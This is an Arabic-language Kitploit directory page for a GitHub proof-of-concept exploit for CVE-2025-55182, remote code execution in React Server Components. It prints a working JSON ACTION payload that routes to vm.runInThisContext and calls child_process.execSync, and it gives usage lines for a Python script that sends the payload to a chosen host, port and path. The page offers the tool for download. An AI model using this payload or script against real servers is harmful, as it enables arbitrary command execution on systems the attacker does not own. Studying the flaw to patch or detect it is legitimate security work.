Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182POC — إثبات مفهوم لثغرة CVE-2025-55182، يوضح تنفيذ تعليمات برمجية عن بعد في مكونات خادم React عبر حمولات ACTION ضارة وحقن vm.runInThisContext. | Kitploit
أدوات/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

إثبات مفهوم لثغرة CVE-2025-55182، يوضح تنفيذ تعليمات برمجية عن بعد في مكونات خادم React عبر حمولات ACTION ضارة وحقن vm.runInThisContext.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 React Server Components RCE POC

هذا المشروع هو إثبات المفهوم لـ CVE-2025-55182 - React Server Components (RSC) RCE، ويوضح أنه في ظل ظروف معينة يمكن تشغيل تنفيذ الأوامر عن بُعد عبر vm.runInThisContext مع ACTION payload الخبيثة.

  • جانب Python: إرسال تلقائي لـ ACTION payload الخبيثة وتحليل الاستجابة

⚠ ملخص الثغرة (CVE-2025-55182)

تحميل ACTION الخاص بـ React Server Components في ظل ظروف معينة سيكون:

  • إلغاء تسلسله إلى كائن JS
  • إدخاله إلى vm.runInThisContext للتنفيذ
  • حقنه تلقائيًا في server actions

يمكن للمهاجم إنشاء التحميل التالي:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
المعاملإلزامي؟القيمة الافتراضيةالوصف
--hostنعملا يوجدعنوان IP أو اسم المجال للخادم الهدف. مثال: 127.0.0.1، 192.168.1.10، example.com
--portلا80منفذ خدمة HTTP الهدف، مثال: 3003
--pathنعملا يوجدمسار التوجيه الذي يمكن أن يؤدي إلى الثغرة، مثال: /feedback، /action
--httpsلاFalseهل يتم استخدام HTTPS لإرسال التحميل (افتراضيًا HTTP)

python a.py --host <IP_الهدف> --port <المنفذ> --path <مسار_URL_الهدف>

python a.py --host 127.0.0.1 --port 3003 --path /feedback

تنزيل الأداة